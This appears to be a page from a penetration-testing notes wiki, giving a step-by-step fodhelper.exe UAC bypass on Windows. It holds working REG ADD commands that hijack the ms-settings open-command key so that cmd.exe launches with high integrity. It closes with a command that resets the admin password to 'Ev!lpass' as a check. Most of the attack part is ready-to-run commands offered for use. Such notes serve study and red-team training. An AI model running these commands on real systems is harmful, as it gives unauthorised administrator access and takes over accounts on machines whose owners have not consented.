UAC Bypass

UAC bypass

User Access Control

********************************************Vulnerable Binary for example : fodhelper.exe

  • Gather info regarding exe integrity level & permission req.

    Tool :- sigcheck.exe

    • In Cmd, cd to SysternalsSuite directory sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

    • It show that Administrator is required and Autoelevate is true

  • Gather info about how this exe interact with file system and windows registry

    Tool : Procmon.exe (process monitor) from sysinternals

    • Open Procmon.exe tool , start fodhelper.exe , Add below filters

    • Filter: Process Name , is , fodhelper.exe , Include

    • Filter: Operation , contains , Reg , Include

    • Filter: Result , is , NAME NOT FOUND , Include

    • Filter: Path , contains , HKCU , Include

    • Now , Apply filter and locate for some interesting path that can be modified For ex: HKCU:\Software\Classes\ms-settings\shell\open\command can be checked.

    • Now , Change Path filter and remove Result Filter: Path , contains , ms-settings\shell\open\command , Include

    • Check If the process can successfully access that key in some other hive, the results will provide us with more clues. Like When HKCU:\Software\Classes\ms-settings\shell\open\command is not found . It locate HKCR which exist and is successful

    • As exe tries to find HKCU:\Software\Classes\ms-settings\shell\open\command first , the path can be modified as we have necessary permission to edit it

    • Add this key with REG utility in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command

    • Now, restart the fodhelper.exe and add 1st four filters

    • Vuln exe is looking DelegateExecute in new added key

    • Add DelegateExecute with empty value in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

    • Again , restart the fodhelper.exe and add 1st . 2nd , 4th filters

    • This time it is suucessful but since DelegateExecute is empty , it also look for (Default) entry value of the Shell\open\command registry key. The (Default) entry value is created as null automatically when adding any registry key

    • Replace the empty (Default) value with an executable of our choice, cmd.exe in cmd REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

    • Exploit

      • Restart fothelper.exe , it will now open CMD automatically with high intergrity level

      • To check , if we have successfully achieve high integrity , try to change admin password net user admin Ev!lpass

    • Automation tool

PreviousEscalation PathNextBinary hijacking / Insecure file permissions

Last updated